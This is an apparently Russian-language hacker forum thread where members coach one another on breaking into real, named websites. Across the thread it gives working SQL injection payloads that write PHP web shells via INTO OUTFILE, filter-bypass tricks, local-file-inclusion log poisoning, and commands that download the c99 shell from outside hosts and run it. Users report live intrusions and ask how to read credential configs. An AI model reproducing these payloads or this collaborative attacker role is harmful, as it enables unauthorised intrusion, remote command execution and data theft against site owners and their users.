Konqi
каким образом на одном и том же сайте php-скрипты обладают разными правами ?


когда создают разные пользователи

+ sefa mode=On

когда создают разные пользователи
извини, возможно я что-то не догоняю, но скорее ты похоже меня не понял:
* я залил шел через control/index.php - он имеет "право" создавать файлы в photo/
* я (в той же сессии, тем же браузером, и прочие бла бла) захожу через photo/158.php.jpg и тут уже нет прав на создание файлов в photo/

извини, возможно я что-то не догоняю, но скорее ты похоже меня не понял:
* я залил шел через control/index.php - он имеет "право" создавать файлы в photo/
* я (в той же сессии, тем же браузером, и прочие бла бла) захожу через photo/158.php.jpg и тут уже нет прав на запись в photo/


если можно загрузи wso, посмотрим что тут творится,а то твой шелл просто ужас,глаза уже заболели =\

у меня тоже такое было,даже не мог посмотреть файлы на текущей директории

158.php.jpg это wso

DrakonHaSh, грузи другой шел который обходит Safe-mode

warlok посоветуй плиз какой конкретно, я пробовал c99madshell и wso2.4, другими не пользовался

[добавлено]
попробовал PPS 1.0 - Perl-cgi web shell by Pashkela, но отображается текстом.
залил такой .htaccess

Options +ExecCGI
AddHandler cgi-script cgi pl

проблема решена :)

но если кто ответит на мои вопросы то тоже будет очень клева ;)

Не могу составить правильный запрос, наверно дико туплю
http://www.macemates.net/news.asp?P=7+AND+1=2--
http://www.macemates.net/news.asp?P=7%27+AND+1=2--
http://www.macemates.net/news.asp?P=7%29+AND+1=2--
не прокатывают, как вы составляете правильное выражение ???
пожалуста пример если можно

не прокатит
Microsoft VBScript runtime error '800a000d'

Type mismatch: 'Cint'

/news.asp, line 110

Microsoft JET Database Engine error '80040e14'

значит бд у нас Microsoft JET Database. следовательно запросы передаются на низком уровне. =(((

здрасте

Не Могу понять в чем проблема..
делаю такой запрос :

6+union+select+1+into+outfile+'1.php'+--+

на что получил ответ :

display_db_query: SELECT content from page where id = -6 union select 1 into outfile '1.php' -- File '1.php' already exists

ТОЕСТЬ я могу создавать файлы ?

потом делаю что то такое:

6+union+select+load_file(0x3C3F7061737374687275282 45F4745545B27636D64275D293B3F3E)+into+outfile+'1.p hp'+--+

на что получил ответ :
display_db_query: SELECT content from page where id = 6 union select load_file(0x3C3F706173737468727528245F4745545B2763 6D64275D293B3F3E) into outfile '1.php' -- File '1.php' already exists


и как мне теперь проверить что у меня получилось ?
где мне найти этот '1.php'

если кому не лень можна и попадробней в PM

спс за время. ;)

в дефолтной папке mysql (уже не помню какая) уже есть файл 1.php. Зачем тебе его искать? Можно в /tmp создать
PS в пм мне не надо писать, я не умею ломать сайты и никогда этим не занимался

ТОЕСТЬ я могу создавать файлы ?
да

где мне найти этот '1.php'
@@datadir

и как мне теперь проверить что у меня получилось ?
прочитать этот файл через load_file




P.S. Я на все твои вопросы ответил, ответь на 1 мой. Сколько нужно курить, чтобы составить этот запрос?
+union+select+load_file(0x3C3F7061737374687275282 45F4745545B27636D64275D293B3F3E)+into+outfile+'1.p hp'+--+

Microsoft JET Database Engine error '80040e14'

значит бд у нас Microsoft JET Database. следовательно запросы передаются на низком уровне. =(((
Можно поподробнее про передачу запросов на низком уровне? Спасибо.

Можно поподробнее про передачу запросов на низком уровне? Спасибо.
Ну это, наверное, только при особых условиях

Какие есть способы заливки шела на vBulletin® Version 3.8.5

Какие есть способы заливки шела на vBulletin® Version 3.8.5
а поиском кто будет пользоватся?
click (https://forum.antichat.ru/thread22852.html)

Да хотелось бы знать что за низкий уровень, и как его использовать

пробовал так 1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда

cmd=eval(file_get_contents('http://site.ru/downloads/shell.txt'));
и
cmd=include($_GET['http://site.ru/downloads/shell.txt']);

нефига не работают!!

пробовал так

cmd=eval(file_get_contents('http://site.ru/downloads/shell.txt'));
и
cmd=include($_GET['http://site.ru/downloads/shell.txt']);

нефига не работают!!

не больше 60 кб - ничто не мешает вам туда вставить сразу код WSO

не больше 60 кб - ничто не мешает вам туда вставить сразу код WSO

В таком случае форум выдает ошибку
(но шел востпроизводится)

Ваш запрос не может быть обработан, так как маркер безопасности отсутствует.

Если эта ошибка произошла после выполнения обычного действия и при повторном выполнении действий она не исчезает, то, пожалуйста, сообщите администратору об этом, не забыв указать максимально полное описание действий, которые привели к её возникновению.

В таком случае форум выдает ошибку
(но шел востпроизводится)
классика жанра <? system($_GET[cmd]); ?>

Gorev Повтарюсь что
eval
и
include
неработают!!

удалось только загрузить шел в папку тмп
и сделать локальный инклуид
cmd=include("/tmp/shell.php");
но и в этом случае такая же фигня получается...

Gorev Повтарюсь что
eval
и
include
неработают!!

удалось только загрузить шел в папку тмп
и сделать локальный инклуид
cmd=include("/tmp/shell.php");
но и в этом случае такая же фигня получается...
а через passthru пробовал?

GOGA075

в сообщении Gorev-a нет Eval или include :)

тут функция system,будешь работать с командами системы

ну а какие команды у нас идут под <? system($_GET[cmd]); ?> ??

GOGA075 твой шелл shell.php?cmd=passthru('system commands');
мое предложениe shell.php?cmd=system commands

В таком случае форум выдает ошибку
(но шел востпроизводится)

sss) И? Воспроизводится тоже с глюками? Или работает, но вас смущает вывод ошибки? Или вы думаете поселить шелл навечно в факе?) Загрузить нужное файло в другое место (из шелла) религия не позволяет?

sss) И? Воспроизводится тоже с глюками? Или работает, но вас смущает вывод ошибки? Или вы думаете поселить шелл навечно в факе?) Загрузить нужное файло в другое место (из шелла) религия не позволяет?

Я не такой уж дебил шоб шелы там оставлять...
А эта ошибка нидает нормально работать шелу. Там на какую ссылку не ткни такая ошибка и скрипт не выполняется дальше!!

вот всё, что сверху в шеле написано, пока вы ничего не тыкаете (на ссылки, после чего шелл, зараза, отказывается работать), сюда выложите плз. А заодно посмотрите папочки, которые зелененькие. Так же не мешало бы для начала вместо кода шелла вставить код, воспроизводящий phpinfo, и внимательно там почитать, т.к. скорее что-то там точно ON и disabled

вот всё, что сверху в шеле написано, пока вы ничего не тыкаете (на ссылки, после чего шелл, зараза, отказывается работать), сюда выложите плз. А заодно посмотрите папочки, которые зелененькие. Так же не мешало бы для начала вместо кода шелла вставить код, воспроизводящий phpinfo, и внимательно там почитать, т.к. скорее что-то там точно ON и disabled
Вот сама ошибка
http://img11.imageshost.ru/imgs/100518/caab2e0bda/9a6c2.jpg
сервер работает под Linux

В принципе вапрос решился сам собой, после удаления куки админа!

пробовал так
и
cmd=include($_GET['http://site.ru/downloads/shell.txt']);

нефига не работают!!
меня одного смутило? :D

да


@@datadir


прочитать этот файл через load_file




P.S. Я на все твои вопросы ответил, ответь на 1 мой. Сколько нужно курить, чтобы составить этот запрос?

Спасибо..

Посидел почитал ... понял что за бред написал ( Буду курить менче ;) )

Воспользовался советами :

Чтобы не париться отвечу что в /var/lib/mysql/ipw18/www/ нельзя делать запись

Попробовал залить в категорию :/var/lib/mysql/ipw18/
следующим образам

6+union+select+0x3c3f7068702073797374656d28245f474 5545b5c27636d645c275d293b203f3e+into+outfile+'/var/lib/mysql/ipw18/2.php'+--+

На что мне ругнулся сайт, значит всё норм ....
теперь не могу догнать как его прочесть ?
пробовал www.site.com/2.php?cmd=dir .. но нифига



Решил попробовать пойти другим путем:

union+select+0x3c3f7068702073797374656d28245f47455 45b5c27636d645c275d293b203f3e+into+outfile+'/tmp/2.php'+--+

здесь тодзе вопрос, ww.site.com/????? (нужна cmd)


Народ я хоть в правильном направление двигаюсь ?

Спасибо..

Посидел почитал ... понял что за бред написал ( Буду курить менче ;) )

Воспользовался советами :

Чтобы не париться отвечу что в /var/lib/mysql/ipw18/www/ нельзя делать запись

Попробовал залить в категорию :/var/lib/mysql/ipw18/
следующим образам

6+union+select+0x3c3f7068702073797374656d28245f474 5545b5c27636d645c275d293b203f3e+into+outfile+'/var/lib/mysql/ipw18/2.php'+--+

На что мне ругнулся сайт, значит всё норм ....
теперь не могу догнать как его прочесть ?
пробовал www.site.com/2.php?cmd=dir .. но нифига



Решил попробовать пойти другим путем:

union+select+0x3c3f7068702073797374656d28245f47455 45b5c27636d645c275d293b203f3e+into+outfile+'/tmp/2.php'+--+

здесь тодзе вопрос, ww.site.com/????? (нужна cmd)


Народ я хоть в правильном направление двигаюсь ?


в веб-директорию сайта заливать нужно.

Спасибо..

Посидел почитал ... понял что за бред написал ( Буду курить менче ;) )

Воспользовался советами :

Чтобы не париться отвечу что в /var/lib/mysql/ipw18/www/ нельзя делать запись

Попробовал залить в категорию :/var/lib/mysql/ipw18/
следующим образам

6+union+select+0x3c3f7068702073797374656d28245f474 5545b5c27636d645c275d293b203f3e+into+outfile+'/var/lib/mysql/ipw18/2.php'+--+

На что мне ругнулся сайт, значит всё норм ....
теперь не могу догнать как его прочесть ?
пробовал www.site.com/2.php?cmd=dir .. но нифига



Решил попробовать пойти другим путем:

union+select+0x3c3f7068702073797374656d28245f47455 45b5c27636d645c275d293b203f3e+into+outfile+'/tmp/2.php'+--+

здесь тодзе вопрос, ww.site.com/????? (нужна cmd)


Народ я хоть в правильном направление двигаюсь ?
/tmp/ - директория не доступная с веба.
Если льете в нее, то необходим lfi, что-бы этот файл проинклудить и выполнить.
Насчет www.site.com/2.php?cmd=dir, а файл то создался? Если файл создался, но выполнения команд нету, то скорее всего, вы залили неверное содержимое.

Microsoft JET Database Engine error '80040e14'

значит бд у нас Microsoft JET Database. следовательно запросы передаются на низком уровне. =(((
Можно поподробнее про передачу запросов на низком уровне? Спасибо.
Поднимаю свой вопрос. Не могу спокойно спать, всё время думаю о низкоуровневых запросах.

.Slip

кажется я что то нашел,но не уверен :)

http://www.citforum.ru/database/cache/gateway/

/tmp/ - директория не доступная с веба.
Если льете в нее, то необходим lfi, что-бы этот файл проинклудить и выполнить.
Насчет www.site.com/2.php?cmd=dir, а файл то создался? Если файл создался, но выполнения команд нету, то скорее всего, вы залили неверное содержимое.

Спс

в /var/lib/mysql/ipw18/www/ нельзя делать запись.
(Can't create/write to file '/var/lib/mysql/ipw18/www/2.php' (Errcode: 2)


По поводу local file include..
где можна с этим ознакомится .. в googl.ru ничего покачто не нашел (что мог бы переварит и понять :) )

Куда еще можна залить шелл кроме как ('site/www') или ('tmp')
Для меня это тёмный лес покачто, если есть статья то поделитесь люди добрые (link) :p

По поводу local file include..
где можна с этим ознакомится .. в googl.ru ничего покачто не нашел (что мог бы переварит и понять :) )


http://forum.antichat.ru/nextnewesttothread30606.html
https://forum.antichat.net/showthread.php?p=188561

Про лфи - это ко мне, дооо. Просто пока ми изучаю низкоуровневые MSSQL inj

...там низкоуровневые запросы в SQL. "ну ты понел" (с)

в /var/lib/mysql/ipw18/www/ нельзя делать запись.
(Can't create/write to file '/var/lib/mysql/ipw18/www/2.php' (Errcode: 2)

Конечно туда "нельзя делать запись". Ведь этой диры нету, и (Errcode: 2) как раз об этом говорит тебе.

Было-бы удивительно если-бы она там оказалась =\

С каких дел в дирректории мускула какой-то мудак будет размещать веб? Где ты берёшь эти чудопути?

To Konqi , спс !

To Jokester

короче
сделал запрос : union+select+@@datadir+--+

в ответ мне выдало :
/var/lib/mysql/ipw18/

-----------
вот с чего я начал :union+select+version()+into+outfile+'/tmp/1.txt+--+
мне выдало :
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /hermes/bosweb/web292/b2929/ipw.****(site name ;) **/public_html/****(site name ;) **/code/page_functions.php on line 40

дальше: union+select+load_file('/tmp/1.txt')+--+
мне выдало : version 5.............
-------------

к чему я это все, каким образом мне узнать директорию куда надо залить шелл для его чтения в виде site.ru/shell?cmd=dir .... ну или как поступить ?

не ругайся насяльника Jokester

/hermes/bosweb/web292/b2929/ipw.****(site name **/public_html/****(site name **/
вот сам же полный путь и скрыл значить в курсе что это путь до веба ? ))

короче если сделаешь так
union+select+version()+into+outfile+"/hermes/bosweb/web292/b2929/ipw.****(site name **/public_html/****(site name **/version.txt"+--+
если есть права на запись , если нет ищи другие папки
то в вебе можешь вызвать site.com/version.txt и все
а вместо этого файла можешь залить полноценный шелл ....
======
допустим название твоего сайта XXXL.com
тогда делаем так
+and+1=0+Union+Select+NULL,NULL,NULL,NULL"<? system($_REQUEST['cmd']); ?>",NULL,NULL+INTO+OUTFILE "/hermes/bosweb/web292/b2929/XXXL.com/public_html/XXXL.com/shell.php"
после вызовем
www.XXXL.com/shell.php?cmd=dir или ls смотря какая ОС

shell_c0de
Синтаксис только поправь в запросах (кавычки и слеши), а то он так никогда не разберётся :)

И да, ось там разумеется unixlike, это по путям видно

Как заинклюдить через LFI конфиги phpmyadmin и/или CPanel, что бы посмотреть акки пользователей. Возможно такое?

Как заинклюдить через LFI конфиги phpmyadmin и/или CPanel, что бы посмотреть акки пользователей. Возможно такое?
Если есть (LFI) инклуд попробуй просто залить шелл и через него посмотреть скрипты/конфиги вариантов много ...
а так прочитай конфиги
/var/lib/mysql/my.cnf
/etc/mysql/my.cnf
/etc/my.cnf
или дефолтные пути ПМА

/phpm/
/phpmy/
/phpmyadmin/
/PMA/
/mysql/
/admin/
/db/
/dbadmin/
/web/phpMyAdmin/
/admin/pma/
/admin/phpmyadmin/
/admin/mysql/
/phpmyadmin2/
/mysqladmin/
/mysql-admin/
/phpMyAdmin-2.5.6/
для начало просто инклуди индекс и смотри что куда инклудится в скриптах и про /proc/self/environ не забудь прочитать

Изначально пытался залить шелл через /proc/self/environ и User Agent, пробовал по разному через system и copy облом, только одним способом получилось просмотреть корневую директорию <?eval(file_get_contents('http://********.ru/1.txt'));?>, а при попытке перехода или открытия файла кидает на 404 страницу, вообще я понимаю из за чего это происходит. Должно быть так index.php?e=eval(file_get_contents('http://********.ru/1.txt')); но как это сделать если я вставляю код через User Agent. Вообще у меня мало опыта может я что то упустил

всем привет!
случай такой,есть инклуд файлов,
http://www.aiesec-berlin.de/KDK/index.php?load=file
вот вроде как найшел error_logs причем они одинаковые..
http://www.aiesec-berlin.de/KDK/index.php?load=../../../../../../../../../../proc/self/fd/2
http://www.aiesec-berlin.de/KDK/index.php?load=../../../../../../../../../../proc/self/fd/6

удалось впихнуть в них свой код:
http://www.aiesec-berlin.de/KDK/index.php?load=../../../../../../../../../../proc/self/fd/6%00<? include('http://shell.narod.ru/testing.php');?>

в ответ в логах вижу это:
http://shell.narod.ru/testing.php => `testing.php' Resolving shell.narod.ru... 213.180.199.41 Connecting to shell.narod.ru|213.180.199.41|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 23,104 (23K) [application/octet-stream] testing.php: Permission denied Cannot write to `testing.php' (Permission denied)

ребят есть сайтег,в общем restore базы phpbb => как всегда profile.php?mode=editprofile&cmd=phpinfo();

интересно то что несколько раз мне нормально выдал phpinfo, а вот сейчас делаю тот же запрос но идет редирект на index.php, или на какой то другой скрипт(vraag.php?url=profile_data.php)

подскажите с чем это может быть связано,что profile.php не работает..

в ответ в логах вижу это:
http://shell.narod.ru/testing.php => `testing.php' Resolving shell.narod.ru... 213.180.199.41 Connecting to shell.narod.ru|213.180.199.41|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 23,104 (23K) [application/octet-stream] testing.php: Permission denied Cannot write to `testing.php' (Permission denied)
я такое там нашел:
PHP Warning: include(): URL file-access is disabled in the server configuration

allow_url_fopen On On
allow_url_include Off Off

залил шел так:
1.

http://www.aiesec-berlin.de/KDK/index.php?load=StSigX15981<?php copy($_GET[aa],$_GET[bb]);include($_GET[bb]); ?>EndSigX15981
2.
http://www.aiesec-berlin.de/KDK/index.php?load=../../../../../../../../../../proc/self/fd/6%00&aa=http://madnet.name/files/download/9_c99madshell.php&bb=/tmp/qwe.php

кривовато правда получилось (к шелу еще вся эта хрень грузится), но работает :)
думаю с этим можно дальше уже справиться

чето уже негрузится:)
видать пропалили...
http://www.aiesec-berlin.de/KDK/index.php?load=../../../../../../../../../../proc/self/fd/2

а вообще если можно то поподробнее,шелл у тебя вместе с логами грузился?

и что это ты понаписал StSigX15981???????

и в переменные ты заносил $_GET[aa] $_GET[bb] include($_GET[bb]) это что?
хотя я уже догнал:)
ты присвоил глобальной переменной aa сайт маднета:)
и проинклудил его... прикольно, но очень паливно:)

чето уже негрузится:)
видать пропалили...
http://www.aiesec-berlin.de/KDK/index.php?load=../../../../../../../../../../proc/self/fd/2

а вообще если можно то поподробнее,шелл у тебя вместе с логами грузился?

и что это ты понаписал StSigX15981???????

и в переменные ты заносил $_GET[aa] $_GET[bb] include($_GET[bb]) это что?
хотя я уже догнал:)
ты присвоил глобальной переменной aa сайт маднета:)
и проинклудил его... прикольно, но очень паливно:)
StSigX15981 - это для визуализации в логах того, что запрос нормально записался

да, шел грузился вместе с логами

паливно да, но это я на скорую руку сделал, по умному надо было бы так:
http://www.aiesec-berlin.de/KDK/index.php?load=<?php if ($_GET[cxc]=1){ob_clean();copy($_GET[axa],$_GET[bxb]);include($_GET[bxb]);}; ?>

ob_clean() или ob_end_clean() - попытка очистить все, что было выведено до начала шела - т.е. чтоб грузился только шел, без этих мегабайтов лога. проверить не успел

1. Если на сайте есть файл с правами 777, его можно банально прочитать через браузер, но вот можно ли как нибудь внести в него измения не имея доступа по ftp и ssh

2. Интересует такой вопрос при заливке шела откуда лучше всего его заливать? фри хост?
вообще для каких целей какую площадку лучше использовать? Например если написал на пхп парсер, снифер, брутер или ещё что нибудь подобное.

ребят есть сайтег,в общем restore базы phpbb => как всегда profile.php?mode=editprofile&cmd=phpinfo();

интересно то что несколько раз мне нормально выдал phpinfo, а вот сейчас делаю тот же запрос но идет редирект на index.php, или на какой то другой скрипт(vraag.php?url=profile_data.php)

подскажите с чем это может быть связано,что profile.php не работает..

Если не ошибаюсь то код с которым ты восстановил БД через какое то время удаляется!!!
Лично у меня такое было пару раз!!

1. Если на сайте есть файл с правами 777, его можно банально прочитать через браузер, но вот можно ли как нибудь внести в него измения не имея доступа по ftp и ssh

2. Интересует такой вопрос при заливке шела откуда лучше всего его заливать? фри хост?
вообще для каких целей какую площадку лучше использовать? Например если написал на пхп парсер, снифер, брутер или ещё что нибудь подобное.

1. Никак. хоть какие права там будут!

2. Шел без разницы каким макаром заливать!!
Лучше всего когда юзер и группа ROOT, тогда можешь все файлв изменять. Хотя и тут куча разных факторов!

DrakonSerg Пробуй
www.........com/admin
www.........com/admin.php
www.........com/admininstrator
и так далее. все писать не буду!
А папка читается видно из-за неграмотности или пофигизма администрации сайта!

Привет всем, давненько у Вас не появлялся, вот вновь пришел!
Ребята есть вопрос, сегодня на одном из сайтов искал XSS при вводе <script>alert()</script> фильтр полностью обрезает что находится внутри <script></script>
Пробовал по другому <script 1></script 1> толку ноль!
BB кодами тож пробовал, разрешен код [IM*G][/IM*G] - (* нарочно поставил, что бы форум не реагировал!) если ставишь картинку то показывает ее нормально, если после картинки пробел то показывает только ссылку и тишина.
Подскажите что сделать можно!

WebeX
http://ha.ckers.org/xss.html

я в slq новичек так что не пинайте сильно

http://youthscienceforum.ca/view.php?id=17+and+1=2+union+select+1,2,3,aes_decr ypt(aes_encrypt(concat_ws(0x3a,version(),d atabase(),user()),0x71),0x71),5,6--


Version : 5.0.19-standard
Database : youthscienceforum
User : youthscience@205.207.185.71
OS : apple-darwin8.2.1



для раскрутки скуля достаточно узнать версию. Ну а для чего ещё пишут имя Database , User и OS(как узнать os).

я в slq новичек так что не пинайте сильно

для раскрутки скуля достаточно узнать версию. Ну а для чего ещё пишут имя Database , User и OS(как узнать os).

за красоту :D

я в slq новичек так что не пинайте сильно

для раскрутки скуля достаточно узнать версию. Ну а для чего ещё пишут имя Database , User и OS(как узнать os).
Database.. бывают сразу много баз, и есле выводиш таблицы то пишешь с какой базы, так и в других целях бывает нужда... про user много тебе описывать не буду но посоветую почитать в мануале mysql и т.д...

ребят есть сайтег,в общем restore базы phpbb => как всегда profile.php?mode=editprofile&cmd=phpinfo();

интересно то что несколько раз мне нормально выдал phpinfo, а вот сейчас делаю тот же запрос но идет редирект на index.php, или на какой то другой скрипт(vraag.php?url=profile_data.php)

подскажите с чем это может быть связано,что profile.php не работает..

UP

привет, тут у меня вопрос по mssql inj

http://www.site.com/script.asp?id=convert(int,@@version COLLATE SQL_Latin1_General_Cp1254_CS_AS)--

Sql Version: Microsoft SQL Server 2005 - 9.00.3042.00 (X64)
Feb 10 2007 00:59:02
Copyright (c) 1988-2005 Microsoft Corporation
Enterprise Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)

попробовал or 1=(select db_name())-- редирект дал.

потом без селекта
http://www.site.com/script.asp?id=convert(int,db_name() COLLATE SQL_Latin1_General_Cp1254_CS_AS)--
DB Name: SSDB


запрос:
http://www.site.com/script.asp?id=convert(int,(SELECT TOP 1 cast(name COLLATE SQL_Latin1_General_Cp1254_CS_AS as nvarchar(4000))%2bchar(126) FROM SSDB..sysobjects WHERE xtype=char(85)))--
дает редир :mad:

А ЗАПРОС:
http://www.site.com/script.asp?id=+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+ INFORMATION_SCHEMA.TABLES)--

тоже редирект дает

тут видимо фильтруется select. Кто нит может посоветовать как обходит при таком фильтрации?
заранее спс

попробуй вместо SELECT

1) %53%45%4C%45%43%54
2) SELeCt
3) SEL/*blabla*/ECt
4) 'SEL'+'ECT
5) /*!SELECT*/

попробуй вместо SELECT

1) %53%45%4C%45%43%54
2) SELeCt
3) SEL/*blabla*/ECt
4) 'SEL'+'ECT
5) /*!SELECT*/
пробовал 1+or+1=(/*!SELECT*/+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--


Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near the keyword 'TOP'.
/adredirect.asp, line 23
:(

YuNi|[c


а без top ?

YuNi|[c


а без top ?
собсно вот сам ресурс:

http://www.stockhouse.com/adredirect.asp?sid=7385+or+1=(SELselectECT+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES)--
на без топ ругается на table_name :(

Как в sipt Cookies добавить?добовляю в additional headers
Cookie : PHPSESSID=3d896ce0ca05137e1ffa4f58893706e8
и вроде не работает так

привет, тут у меня вопрос по mssql inj

http://www.site.com/script.asp?id=convert(int,@@version COLLATE SQL_Latin1_General_Cp1254_CS_AS)--

Sql Version: Microsoft SQL Server 2005 - 9.00.3042.00 (X64)
Feb 10 2007 00:59:02
Copyright (c) 1988-2005 Microsoft Corporation
Enterprise Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)

попробовал or 1=(select db_name())-- редирект дал.

потом без селекта
http://www.site.com/script.asp?id=convert(int,db_name() COLLATE SQL_Latin1_General_Cp1254_CS_AS)--
DB Name: SSDB


запрос:
http://www.site.com/script.asp?id=convert(int,(SELECT TOP 1 cast(name COLLATE SQL_Latin1_General_Cp1254_CS_AS as nvarchar(4000))%2bchar(126) FROM SSDB..sysobjects WHERE xtype=char(85)))--
дает редир :mad:

А ЗАПРОС:
http://www.site.com/script.asp?id=+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+ INFORMATION_SCHEMA.TABLES)--

тоже редирект дает

тут видимо фильтруется select. Кто нит может посоветовать как обходит при таком фильтрации?
заранее спс
методом научного тыка:
http://www.stockhouse.com/adredirect.asp?sid=select true
http://www.stockhouse.com/adredirect.asp?sid=+select true
http://www.stockhouse.com/adredirect.asp?sid=select+ false
=> 'select%'
http://www.stockhouse.com/adredirect.asp?sid=(select/**/top+1+table_name+from+information_schema.tables)

Проблема с заливкой, сколько пытаюсь нечего не помогает, в интернете статей по поводу этого нету, везде одно и тоже.. или outfile или dumpfile а если фильтруются ковычки что делать не кто не говорит =(
Читать файлы могу с помощью LOAD_FILE но
-587955+union+select+1,2,3,4,0x6869,6,7,8,9,10,11+i nto+outfile+'/home/data/www/2323.php'+from+mysql.user--
не пашет, так как фильтрует кавычки, дамп файл тоже не пашет, кодировки в чар, хекс и тд и тп тоже не помагают, второй подзапрос с обходом магик_куотс не прокатывает =( что еще можно применить ? (мозг и руки уже имеются)

Проблема с заливкой, сколько пытаюсь нечего не помогает, в интернете статей по поводу этого нету, везде одно и тоже.. или outfile или dumpfile а если фильтруются ковычки что делать не кто не говорит =(
Читать файлы могу с помощью LOAD_FILE но
-587955+union+select+1,2,3,4,0x6869,6,7,8,9,10,11+i nto+outfile+'/home/data/www/2323.php'+from+mysql.user--
не пашет, так как фильтрует кавычки, дамп файл тоже не пашет, кодировки в чар, хекс и тд и тп тоже не помагают, второй подзапрос с обходом магик_куотс не прокатывает =( что еще можно применить ? (мозг и руки уже имеются)

file_priv что говорит?

file_priv что говорит?
Читать файлы могу с помощью LOAD_FILE, FILE_PRIV есть.


Ошибки сервера выложить не могу, так как их нету (в смысле на экране))

обычным смертным это не дано=((( в привате наверно есть какие-нибудь методы....

обычным смертным это не дано=((( в привате наверно есть какие-нибудь методы....
Надеюсь найдутся добрые люди которые хотя бы шипнут про способ)

пы.сы. И если есть пхп программеры, может у кого найдется скрипт который при выполнении скачает txt файл с внешки и переименует его в php (Это не для скули)

copy('http://2.ru/1.txt', '1.php');

Проблема с заливкой, сколько пытаюсь нечего не помогает, в интернете статей по поводу этого нету, везде одно и тоже.. или outfile или dumpfile а если фильтруются ковычки что делать не кто не говорит =(
Читать файлы могу с помощью LOAD_FILE но
-587955+union+select+1,2,3,4,0x6869,6,7,8,9,10,11+i nto+outfile+'/home/data/www/2323.php'+from+mysql.user--
не пашет, так как фильтрует кавычки, дамп файл тоже не пашет, кодировки в чар, хекс и тд и тп тоже не помагают, второй подзапрос с обходом магик_куотс не прокатывает =( что еще можно применить ? (мозг и руки уже имеются)

А ты на 100% уверен что у тебя путь до дериктории правельный??
Если нет ошибок на страничке, тогда как ты узнал путь?
и ести у тебя есть доступ к mysql, то ищи phpmyadmin, или пробуй на удаленный доступ!

А ты на 100% уверен что у тебя путь до дериктории правельный??
Если нет ошибок на страничке, тогда как ты узнал путь?
и ести у тебя есть доступ к mysql, то ищи phpmyadmin, или пробуй на удаленный доступ!

На 100% уверен что путь правельный, доступ к серверу так же имею с помощью бага phpmyadmin

$output = `ls -la /home/data/www`;
print "<pre>$output</pre>";
exit;
Но увы я под юзверем apache и создавать, именять, архивировать, редактировать, удалять и тд и тп не имею права, вообщем ограничен до хрен знает чего.
Щя еще попробую скачать с внешки с помощью скрипта.

Полного доступа к mysql у меня нету, только скуля, логин и пароль админа среди 900к+ юзверев искать (если учесть что там все ид номера в разброс и все не попорядку, так еще и через лимит, так как group_concat выводит не все) просто бред, а автоматизированного способа я не знаю =(

+ ко всему этому все конфигурационные файлы 667, т.е. читать с помощью скули или команды cat я не могу.

Я очень давно всем этим не занимался, вот пришлось вспомнить

Ребята, помогите, очень нужна помощь.
Как в SQL-injection можно заменить запятую (именно запятую, не кавычку)? Вижу вариант только с char(44), но не знаю как правильно запрос составить. Вот пример:

index.php?id=-999+union+select+1+char(44)+2+char(44)+3+--+

или как-то через скобки?

Уже столько вариантов перепробовал, и не знаю что делать.

CTAPu4OK
поиск доступных файлов/папок для записи:
find /home/data/www -perm -2 -ls

доступ к /tmp/bla.php есть практически всегда

если у тебя есть возможность выполнять php код на сервере то с кавычками можно бороться так:
<?eval(base64_decode($_GET[shell]));?>

Ребята, помогите, очень нужна помощь. Как в SQL-injection можно заменить запятую (именно запятую, не кавычку)? Вижу вариант только с char(44), но не знаю как правильно запрос составить. Вот пример: index.php?id=-999+union+select+1+char(44)+2+char(44)+3+--+ или как-то через скобки? Уже столько вариантов перепробовал, и не знаю что делать.


попробуй:
index.php?id=-999+union+select+1%2С2%2С3--

Через %2С не прокатило :mad:

CTAPu4OK
поиск доступных файлов/папок для записи:
find /home/data/www -perm -2 -ls

доступ к /tmp/bla.php есть практически всегда

если у тебя есть возможность выполнять php код на сервере то с кавычками можно бороться так:
<?eval(base64_decode($_GET[shell]));?>
Ты потом этот скрипт от туда никак не воспроизведешь!!

Ребята, помогите, очень нужна помощь.
Как в SQL-injection можно заменить запятую (именно запятую, не кавычку)? Вижу вариант только с char(44), но не знаю как правильно запрос составить. Вот пример:

index.php?id=-999+union+select+1+char(44)+2+char(44)+3+--+

или как-то через скобки?

Уже столько вариантов перепробовал, и не знаю что делать.
0x2c

upd, ступил, думал тебе в переменную надо)

тогда так:
index.php?id=-999+union+select+1/*!,*/2/*!,*/3--

можно и так
если версия mysql 5
index.php?id=-999+union+select+1/*!12345,*/2/*!12345,*/3--

4 версия
index.php?id=-999+union+select+1/*!1234,*/2/*!1234,*/3--

etc...

CTAPu4OK
поиск доступных файлов/папок для записи:
find /home/data/www -perm -2 -ls

доступ к /tmp/bla.php есть практически всегда

если у тебя есть возможность выполнять php код на сервере то с кавычками можно бороться так:
<?eval(base64_decode($_GET[shell]));?>

Папки все доступны для записи, но права ограничены что даже скопировать не могу =(
php коды могу выполнять, но тоже ограниченные и после каждого кода идет exit; т.е. использовать код можно только один раз и в дальнейшем его нельзя использовать)

т.е. Сам експлойт на одном сервере, txt файл с исполняющимися коммандами на другом сервере, а пхп май админ на другом)

Ты потом этот скрипт от туда никак не воспроизведешь!!
ты ищи возможности, а не недостатки - и тогда успех станет случаться намного чаще чем облом ;)

CTAPu4OK
попробуй так

команда 1.
copy("http://madnet.name/files/download/9_c99madshell.php","/tmp/qwe.php");

команда 2.
include("/tmp/qwe.php");

ты ищи возможности, а не недостатки - и тогда успех станет случаться намного чаще чем облом ;)

CTAPu4OK
попробуй так

команда 1.
copy("http://madnet.name/files/download/9_c99madshell.php","/tmp/qwe.php");

команда 2.
include("/tmp/qwe.php");

У меня то как раз все нормально!!!
и команда copy("http://madnet.name/files/download/9_c99madshell.php","/tmp/qwe.php");
